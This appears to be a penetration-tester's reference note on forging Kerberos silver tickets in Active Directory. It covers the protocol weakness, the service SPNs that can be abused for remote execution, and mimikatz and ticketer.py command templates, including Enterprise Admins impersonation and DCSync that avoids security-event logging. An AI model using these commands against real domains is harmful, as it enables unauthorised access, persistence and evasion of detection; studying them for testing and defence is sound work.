# Exploitation - Kerberos silver tickets ### Overview `Service tickets` are generated by the `Ticket-Granting Service (TGS)` of the `Key Distribution Center (KDC)` and used by clients to access domain resources exposed through service accounts, i.e user accounts that have a `ServicePrincipalName (SPN)` configured. `Service tickets` are generated by the `TGS` upon reception of a valid `Ticket-Granting Ticket (TGT)` using: * One of the secrets (`RC4 key`, whose value is identical to the `NTLM` hash, or `AES 128/256 bits keys`) of the `krbtgt` account (`KDC Signature`). * One of the secrets of the targeted service account (`Server Signature` and encryption of the `TGS`). However, as the service account has no knowledge of the the `krbtgt` account's secrets, no verification is done by default on the `KDC Signature` signature upon receipt and verification of the validity of a `service ticket`. Thus, in the majority of environment, only the knowledge of one of the secrets of the targeted service account is necessary for the generation of valid `service tickets` for the service (and renewals of the `krbtgt`'s password do not invalidate the crafted `service tickets`). Note that the `Kerberos PAC Validation` mechanism can be enabled on a service to enforce a systematic verification of the `service tickets`'s `Privilege Attribute Certificate (PAC)` `KDC Signature` signature with a request to the `KDC`. As the additional verification induced by the mechanism requires an exchange between the server hosting the service and the `KDC`, its activation can cause significant performance degradation. For more information on the `Kerberos` protocol, refer to the \`ActiveDirectory * Kerberos Golden Tickets\` note. To generate a `silver ticket`, the following prerequisites are needed: * The fully qualified domain name and the `SID` of the targeted domain. * The `SPN` and one of the secrets of the targeted service account. **Computers services and machine account exploitation** Windows systems integrated to an Active Directory domain expose a number of services, executed under the machine account authority. These services can be leveraged to remotely access and execute commands on a machine. As such, the compromise of one of the machine account secrets can be used to generate `silver tickets` allowing for remote code execution. `Silver tickets` for machine services can notably be used for persistence after the compromise of a machine or an Active Directory domain (as the secrets of the machine accounts of all the machines integrated to the domain are stored in the `ntds.dit` database). Additionally, if a machine exposes the Windows `SpoolerService` service, through the `MS-RPRN` `MSRPC` interface, and is configured to permit the use of `NetNTLMv1` (`LMCompatibilityLevel` attribute set to 2 or lower), an authentication from the machine to an arbitrary host in `NetNTLMv1` can be remotely triggered and further captured, to ultimately crack the `NetNTLMv1` hash and retrieve the machine account `NTLM` hash. For more information on the attack refer to the `[L7] MSRPC` and `[ActiveDirectory] NTLM capture and relay` notes. Different services are exposed on Windows systems integrated to an Active Directory domain and can be targeted, through their respective `SPN` in the form of `/`, for persistence and remote access: | Possible operation | Service(s) | Description | Related note | | ----------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------------------------------------------------------------------- | |

PsExec-like
file system access

| `CIFS` | Remote execution of commands using `PsExec`-like utilities or full access to the machine file system. |

Windows - Lateral movements
\[L7] 445 - SMB

| | `WMI` |

HOST
RPCSS

| Remote execution of commands through `Windows Management Instrumentation (WMI)` (`Win32_Process` class for example). | `Windows - Lateral movements` | | `WinRM` |

Always necessary:
HOST
HTTP
Host dependant:
WSMAN
RPCSS

| `PowerShell remoting` through `Windows Remote Management (WinRM)`. |

Windows - Lateral movements
\[L7] 5985-5968 - WSMan

| | Windows services | `HOST` | Remote creation and/or execution of Windows services. | `Windows - Lateral movements` | | Scheduled tasks | `HOST` | Remote creation and/or execution of Windows scheduled tasks. | `Windows - Lateral movements` | |

DCSync
LDAP access

| `LDAP` | `LDAP` requests, and notably allows, for `service tickets` to the `LDAP` service of a `Domain Controller`, the conduct of replication operations (`DCSync`). | `[ActiveDirectory] ntds.dit dumping` | | `RSAT` |

CIFS
LDAP
RPCSS

| Use of the PowerShell cmdlets of the Windows `Remote Server Administration Tools (RSAT)` suite. | `[ActiveDirectory] Domain Recon` | The `HOST` service for Windows machines includes a set of machine built-in Windows services, such as the `HTTP`, `SCM` and `SCHEDULE` services, etc. The exhaustive list of services exposed on a Windows machine integrated to an Active Directory domain can be retrieved using the following PowerShell command: ``` # DOMAIN_ROOT_OBJECT = "DC=LAB,DC=AD" for example Get-ADObject -Identity "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration, " -properties sPNMappings ``` ### Silver tickets generation The `mimikatz` utility on Windows and the `Impacket`'s `ticketer.py` Python script can be used to generate `silver tickets`: ``` # (mimikatz) /id: / (ticketer.py) -user-id # Impersonated user Relative ID (RID). Default to 500 (Built-in Administrator account RID). # (mimikatz) /groups: / (ticketer.py) -groups # Impersonated groups membership, in the form of one or a list of groups RID. Default groups RIDs: 513 (Domain Users), 512 (Domain Admins), 520 (Group Policy Creator Owners), 518 (Schema Admins), and 519 (Enterprise Admins, only effective if targeting the root domain). # (mimikatz) /sids: / (ticketer.py) -extra-sid # Additional and arbitrary SID(s) (that may or may not belong to the current domain) to include in the PAC, as if the SIDs were defined in the `SIDHistory` attribute of a domain user. # (mimikatz) /ptt - Directly inject the generated silver ticket in memory # From an authorization standpoint, the specified username does not matter. mimikatz.exe "kerberos::golden /user: /domain: /sid: /target: [/rc4: | /aes128: | /aes256:] /service: [/id:] [/groups:] [/sids:] /ptt" "exit" ticketer.py -domain -domain-sid -spn [-nthash | -aesKey ] [-user-id ] [-groups ] -[extra-sid ] # Access to a Windows system through WinRM (PowerShell Remoting) using one of the targeted computer secret. # Silver tickets the HOST and HTTP services are necessary and usually sufficient. Silver tickets for the WSMAN and/or RPCSS services may additionally be required. mimikatz.exe "kerberos::golden /user: /domain: /sid: /target: [/rc4: | /aes128: | /aes256:] /service:host /ptt" "exit" mimikatz.exe "kerberos::golden /user: /domain: /sid: /target: [/rc4: | /aes128: | /aes256:] /service:http /ptt" "exit" # Impersonates an user member of the "Enterprise Admins" group of the root domain in order to compromise the root domain from any trusted child domain. # For more information, refer to the "Active Directory - Trusts hopping" note. mimikatz.exe "kerberos::golden /user: /domain: /sid: /target: [/rc4: | /aes128: | /aes256:] /service: /sids:"S-1-5-21--519" /ptt" "exit" # Impersonates a Domain Controller in order to conduct DCSync attack without generating Windows "Security" events ("Event 4662: An operation was performed on an object"). # The can be obtained using: (New-Object System.Security.Principal.NTAccount(""," /domain: /sid:: /target: [/rc4: | /aes128: | /aes256:] /service:ldap /id: /groups:516 /sids:S-1-5-21--516,S-1-5-9" /ptt" "exit" ``` ### Silver tickets usage (Pass-the-Ticket) On Windows, `silver tickets` generated using `mimikatz` will be automatically injected in the current logon session if the `/ptt` option is specified. Otherwise, an exported `silver ticket` can be injected using `mimikatz.exe "kerberos::ptt ` for example. On Linux, `silver tickets` generated by `ticketer.py`, in the `credential cache (ccache)` format, can be exported in the `KRB5CCNAME` environment variable for further use through tools supporting the `Kerberos` protocol, such as others `Impacket` Python utilities. Note that `impackets` utilities can only make use of a single `Kerberos tickets` at a time, which limits the possible usage of the utilities with `silver tickets`. Refer to the `[ActiveDirectory] Kerberos tickets usage` for more information on techniques and tools to leverage `silver tickets`. *** ### References TECHNIQUES DE PERSISTANCE ACTIVE DIRECTORY BASÉES SUR KERBEROS - MISC Hors-Série N°20